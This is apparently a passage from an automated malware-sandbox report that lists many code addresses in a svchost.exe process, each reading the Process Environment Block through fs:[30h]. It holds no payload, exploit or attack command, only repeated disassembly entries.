                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640535 mov eax, dword ptr fs:[00000030h]7_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640535 mov eax, dword ptr fs:[00000030h]7_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640535 mov eax, dword ptr fs:[00000030h]7_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640535 mov eax, dword ptr fs:[00000030h]7_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E53E mov eax, dword ptr fs:[00000030h]7_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E53E mov eax, dword ptr fs:[00000030h]7_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E53E mov eax, dword ptr fs:[00000030h]7_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E53E mov eax, dword ptr fs:[00000030h]7_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E53E mov eax, dword ptr fs:[00000030h]7_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C6500 mov eax, dword ptr fs:[00000030h]7_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03704500 mov eax, dword ptr fs:[00000030h]7_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03704500 mov eax, dword ptr fs:[00000030h]7_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03704500 mov eax, dword ptr fs:[00000030h]7_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03704500 mov eax, dword ptr fs:[00000030h]7_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03704500 mov eax, dword ptr fs:[00000030h]7_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03704500 mov eax, dword ptr fs:[00000030h]7_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03704500 mov eax, dword ptr fs:[00000030h]7_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E5E7 mov eax, dword ptr fs:[00000030h]7_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E5E7 mov eax, dword ptr fs:[00000030h]7_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E5E7 mov eax, dword ptr fs:[00000030h]7_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E5E7 mov eax, dword ptr fs:[00000030h]7_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E5E7 mov eax, dword ptr fs:[00000030h]7_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E5E7 mov eax, dword ptr fs:[00000030h]7_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E5E7 mov eax, dword ptr fs:[00000030h]7_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E5E7 mov eax, dword ptr fs:[00000030h]7_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036325E0 mov eax, dword ptr fs:[00000030h]7_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C5ED mov eax, dword ptr fs:[00000030h]7_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C5ED mov eax, dword ptr fs:[00000030h]7_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E5CF mov eax, dword ptr fs:[00000030h]7_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E5CF mov eax, dword ptr fs:[00000030h]7_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036365D0 mov eax, dword ptr fs:[00000030h]7_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A5D0 mov eax, dword ptr fs:[00000030h]7_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A5D0 mov eax, dword ptr fs:[00000030h]7_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B05A7 mov eax, dword ptr fs:[00000030h]7_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B05A7 mov eax, dword ptr fs:[00000030h]7_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B05A7 mov eax, dword ptr fs:[00000030h]7_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036545B1 mov eax, dword ptr fs:[00000030h]7_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036545B1 mov eax, dword ptr fs:[00000030h]7_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03632582 mov eax, dword ptr fs:[00000030h]7_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03632582 mov ecx, dword ptr fs:[00000030h]7_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03664588 mov eax, dword ptr fs:[00000030h]7_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E59C mov eax, dword ptr fs:[00000030h]7_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BC460 mov ecx, dword ptr fs:[00000030h]7_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365A470 mov eax, dword ptr fs:[00000030h]7_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365A470 mov eax, dword ptr fs:[00000030h]7_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365A470 mov eax, dword ptr fs:[00000030h]7_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E443 mov eax, dword ptr fs:[00000030h]7_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E443 mov eax, dword ptr fs:[00000030h]7_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E443 mov eax, dword ptr fs:[00000030h]7_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E443 mov eax, dword ptr fs:[00000030h]7_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E443 mov eax, dword ptr fs:[00000030h]7_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E443 mov eax, dword ptr fs:[00000030h]7_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E443 mov eax, dword ptr fs:[00000030h]7_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E443 mov eax, dword ptr fs:[00000030h]7_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EA456 mov eax, dword ptr fs:[00000030h]7_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362645D mov eax, dword ptr fs:[00000030h]7_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365245A mov eax, dword ptr fs:[00000030h]7_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E420 mov eax, dword ptr fs:[00000030h]7_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E420 mov eax, dword ptr fs:[00000030h]7_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E420 mov eax, dword ptr fs:[00000030h]7_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C427 mov eax, dword ptr fs:[00000030h]7_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B6420 mov eax, dword ptr fs:[00000030h]7_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B6420 mov eax, dword ptr fs:[00000030h]7_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B6420 mov eax, dword ptr fs:[00000030h]7_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B6420 mov eax, dword ptr fs:[00000030h]7_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B6420 mov eax, dword ptr fs:[00000030h]7_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B6420 mov eax, dword ptr fs:[00000030h]7_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B6420 mov eax, dword ptr fs:[00000030h]7_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A430 mov eax, dword ptr fs:[00000030h]7_2_0366A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03668402 mov eax, dword ptr fs:[00000030h]7_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03668402 mov eax, dword ptr fs:[00000030h]7_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03668402 mov eax, dword ptr fs:[00000030h]7_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036304E5 mov ecx, dword ptr fs:[00000030h]7_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036364AB mov eax, dword ptr fs:[00000030h]7_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036644B0 mov ecx, dword ptr fs:[00000030h]7_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BA4B0 mov eax, dword ptr fs:[00000030h]7_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EA49A mov eax, dword ptr fs:[00000030h]7_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362CB7E mov eax, dword ptr fs:[00000030h]7_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E4B4B mov eax, dword ptr fs:[00000030h]7_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E4B4B mov eax, dword ptr fs:[00000030h]7_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C6B40 mov eax, dword ptr fs:[00000030h]7_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C6B40 mov eax, dword ptr fs:[00000030h]7_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FAB40 mov eax, dword ptr fs:[00000030h]7_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D8B42 mov eax, dword ptr fs:[00000030h]7_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DEB50 mov eax, dword ptr fs:[00000030h]7_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365EB20 mov eax, dword ptr fs:[00000030h]7_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365EB20 mov eax, dword ptr fs:[00000030h]7_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F8B28 mov eax, dword ptr fs:[00000030h]7_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F8B28 mov eax, dword ptr fs:[00000030h]7_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AEB1D mov eax, dword ptr fs:[00000030h]7_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638BF0 mov eax, dword ptr fs:[00000030h]7_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638BF0 mov eax, dword ptr fs:[00000030h]7_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638BF0 mov eax, dword ptr fs:[00000030h]7_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365EBFC mov eax, dword ptr fs:[00000030h]7_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BCBF0 mov eax, dword ptr fs:[00000030h]7_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03650BCB mov eax, dword ptr fs:[00000030h]7_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03650BCB mov eax, dword ptr fs:[00000030h]7_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03650BCB mov eax, dword ptr fs:[00000030h]7_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630BCD mov eax, dword ptr fs:[00000030h]7_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630BCD mov eax, dword ptr fs:[00000030h]7_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630BCD mov eax, dword ptr fs:[00000030h]7_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DEBD0 mov eax, dword ptr fs:[00000030h]7_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640BBE mov eax, dword ptr fs:[00000030h]7_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640BBE mov eax, dword ptr fs:[00000030h]7_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E4BB0 mov eax, dword ptr fs:[00000030h]7_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E4BB0 mov eax, dword ptr fs:[00000030h]7_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366CA6F mov eax, dword ptr fs:[00000030h]7_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366CA6F mov eax, dword ptr fs:[00000030h]7_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366CA6F mov eax, dword ptr fs:[00000030h]7_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DEA60 mov eax, dword ptr fs:[00000030h]7_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036ACA72 mov eax, dword ptr fs:[00000030h]7_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036ACA72 mov eax, dword ptr fs:[00000030h]7_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636A50 mov eax, dword ptr fs:[00000030h]7_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636A50 mov eax, dword ptr fs:[00000030h]7_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636A50 mov eax, dword ptr fs:[00000030h]7_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636A50 mov eax, dword ptr fs:[00000030h]7_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636A50 mov eax, dword ptr fs:[00000030h]7_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636A50 mov eax, dword ptr fs:[00000030h]7_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636A50 mov eax, dword ptr fs:[00000030h]7_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640A5B mov eax, dword ptr fs:[00000030h]7_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640A5B mov eax, dword ptr fs:[00000030h]7_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366CA24 mov eax, dword ptr fs:[00000030h]7_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365EA2E mov eax, dword ptr fs:[00000030h]7_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03654A35 mov eax, dword ptr fs:[00000030h]7_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03654A35 mov eax, dword ptr fs:[00000030h]7_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366CA38 mov eax, dword ptr fs:[00000030h]7_2_0366CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BCA11 mov eax, dword ptr fs:[00000030h]7_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366AAEE mov eax, dword ptr fs:[00000030h]7_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366AAEE mov eax, dword ptr fs:[00000030h]7_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03686ACC mov eax, dword ptr fs:[00000030h]7_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03686ACC mov eax, dword ptr fs:[00000030h]7_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03686ACC mov eax, dword ptr fs:[00000030h]7_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630AD0 mov eax, dword ptr fs:[00000030h]7_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03664AD0 mov eax, dword ptr fs:[00000030h]7_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03664AD0 mov eax, dword ptr fs:[00000030h]7_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638AA0 mov eax, dword ptr fs:[00000030h]7_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638AA0 mov eax, dword ptr fs:[00000030h]7_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03686AA4 mov eax, dword ptr fs:[00000030h]7_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA80 mov eax, dword ptr fs:[00000030h]7_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03704A80 mov eax, dword ptr fs:[00000030h]7_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03668A90 mov edx, dword ptr fs:[00000030h]7_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03656962 mov eax, dword ptr fs:[00000030h]7_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03656962 mov eax, dword ptr fs:[00000030h]7_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03656962 mov eax, dword ptr fs:[00000030h]7_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0367096E mov eax, dword ptr fs:[00000030h]7_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0367096E mov edx, dword ptr fs:[00000030h]7_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0367096E mov eax, dword ptr fs:[00000030h]7_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D4978 mov eax, dword ptr fs:[00000030h]7_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D4978 mov eax, dword ptr fs:[00000030h]7_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BC97C mov eax, dword ptr fs:[00000030h]7_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0946 mov eax, dword ptr fs:[00000030h]7_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B892A mov eax, dword ptr fs:[00000030h]7_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C892B mov eax, dword ptr fs:[00000030h]7_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE908 mov eax, dword ptr fs:[00000030h]7_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE908 mov eax, dword ptr fs:[00000030h]7_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BC912 mov eax, dword ptr fs:[00000030h]7_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628918 mov eax, dword ptr fs:[00000030h]7_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628918 mov eax, dword ptr fs:[00000030h]7_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BE9E0 mov eax, dword ptr fs:[00000030h]7_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036629F9 mov eax, dword ptr fs:[00000030h]7_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036629F9 mov eax, dword ptr fs:[00000030h]7_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C69C0 mov eax, dword ptr fs:[00000030h]7_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A9D0 mov eax, dword ptr fs:[00000030h]7_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A9D0 mov eax, dword ptr fs:[00000030h]7_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A9D0 mov eax, dword ptr fs:[00000030h]7_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A9D0 mov eax, dword ptr fs:[00000030h]7_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A9D0 mov eax, dword ptr fs:[00000030h]7_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A9D0 mov eax, dword ptr fs:[00000030h]7_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036649D0 mov eax, dword ptr fs:[00000030h]7_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FA9D3 mov eax, dword ptr fs:[00000030h]7_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A0 mov eax, dword ptr fs:[00000030h]7_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036309AD mov eax, dword ptr fs:[00000030h]7_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036309AD mov eax, dword ptr fs:[00000030h]7_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B89B3 mov esi, dword ptr fs:[00000030h]7_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B89B3 mov eax, dword ptr fs:[00000030h]7_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B89B3 mov eax, dword ptr fs:[00000030h]7_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BE872 mov eax, dword ptr fs:[00000030h]7_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BE872 mov eax, dword ptr fs:[00000030h]7_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C6870 mov eax, dword ptr fs:[00000030h]7_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C6870 mov eax, dword ptr fs:[00000030h]7_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03642840 mov ecx, dword ptr fs:[00000030h]7_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660854 mov eax, dword ptr fs:[00000030h]7_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634859 mov eax, dword ptr fs:[00000030h]7_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634859 mov eax, dword ptr fs:[00000030h]7_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03652835 mov eax, dword ptr fs:[00000030h]7_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03652835 mov eax, dword ptr fs:[00000030h]7_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03652835 mov eax, dword ptr fs:[00000030h]7_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03652835 mov ecx, dword ptr fs:[00000030h]7_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03652835 mov eax, dword ptr fs:[00000030h]7_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03652835 mov eax, dword ptr fs:[00000030h]7_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A830 mov eax, dword ptr fs:[00000030h]7_2_0366A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D483A mov eax, dword ptr fs:[00000030h]7_2_036D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D483A mov eax, dword ptr fs:[00000030h]7_2_036D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BC810 mov eax, dword ptr fs:[00000030h]7_2_036BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FA8E4 mov eax, dword ptr fs:[00000030h]7_2_036FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C8F9 mov eax, dword ptr fs:[00000030h]7_2_0366C8F9
